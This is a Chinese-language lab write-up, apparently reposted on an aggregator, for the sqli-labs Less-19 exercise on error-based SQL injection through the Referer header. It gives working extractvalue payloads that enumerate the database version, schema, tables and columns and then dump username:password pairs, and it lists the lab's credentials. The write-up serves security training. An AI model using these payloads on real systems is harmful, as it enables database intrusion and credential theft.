Less(19)POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

Posted meng-yu37

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Less(19)POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)相关的知识,希望对你有一定的参考价值。

1.单引号,报错型,referer型注入点:

  技术图片

 

   本题和上一题很像,回显是referer,查一下php文加可以发现,insert语句中向数据库插入了referer,所以注入点改为referer

2.爆破

  (1)Referer: ‘ and extractvalue(1,concat(0x7e,(select version()),0x7e)) and ‘

    技术图片

 

     发现没问题

  (2)爆库:‘ and extractvalue(1,concat(0x7e,(select database()),0x7e)) and ‘

    技术图片

  (3)爆表: ‘ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and ‘

    技术图片

  (4)爆列名:‘ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘users‘ and column_name not in(‘user_id‘,‘first_name‘,‘last_name‘,‘user‘,‘avatar‘,‘last_login‘,‘failed_login‘)))) and ‘

    技术图片

  (5)爆值:‘ and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users))) and ‘

    技术图片

 

     

    通过 not in(),我们可以找到所有的用户名和密码:

    Dumb:Dumb    Angelinal:I-kill-you   Dummy:p@ssword   secure:crappy   stupid:stupidiry   superman:genious   batman:mob!le   admin:admin   admin1:admin1   admin2:admin2   admin3:admin3   dhakkan:dumbo   admin4:admin4

以上是关于Less(19)POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

如何在 POST 表单上设置 Header 字段?

Less 嵌套(Nesting 用法

less嵌套

vue3 less 的使用 手写header/context/menu 组件

vue3 less 的使用 手写header/context/menu 组件